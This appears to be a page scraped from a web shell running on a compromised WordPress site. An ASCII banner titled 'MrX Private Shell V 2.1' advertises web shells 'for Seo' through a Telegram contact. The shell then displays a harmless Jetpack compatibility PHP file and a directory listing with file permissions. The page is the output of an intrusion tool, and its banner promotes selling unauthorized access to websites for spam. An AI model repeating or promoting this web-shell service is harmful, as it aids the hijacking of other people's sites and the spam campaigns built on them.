__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Legacy global scope functions.
*
* @package automattic/jetpack-compat
*/
// If WordPress's plugin API is available already, use it. If not,
// drop data into `$wp_filter` for `WP_Hook::build_preinitialized_hooks()`.
if ( function_exists( 'add_filter' ) ) {
$add_filter = 'add_filter';
$add_action = 'add_action';
} else {
$add_filter = function ( $name, $cb, $priority = 10, $accepted_args = 1 ) {
global $wp_filter;
// phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited
$wp_filter[ $name ][ $priority ][] = array(
'accepted_args' => $accepted_args,
'function' => $cb,
);
};
$add_action = $add_filter;
}
/**
* Load necessary functions.
*/
function jetpack_compat_require_defined_functions() {
require_once __DIR__ . '/lib/tracks/client.php';
}
$add_action( 'plugins_loaded', 'jetpack_compat_require_defined_functions' );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| legacy | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| CHANGELOG.md | File | 5 KB | 0644 |
|
| LICENSE.txt | File | 17.98 KB | 0644 |
|
| SECURITY.md | File | 2.45 KB | 0644 |
|
| functions.php | File | 877 B | 0644 |
|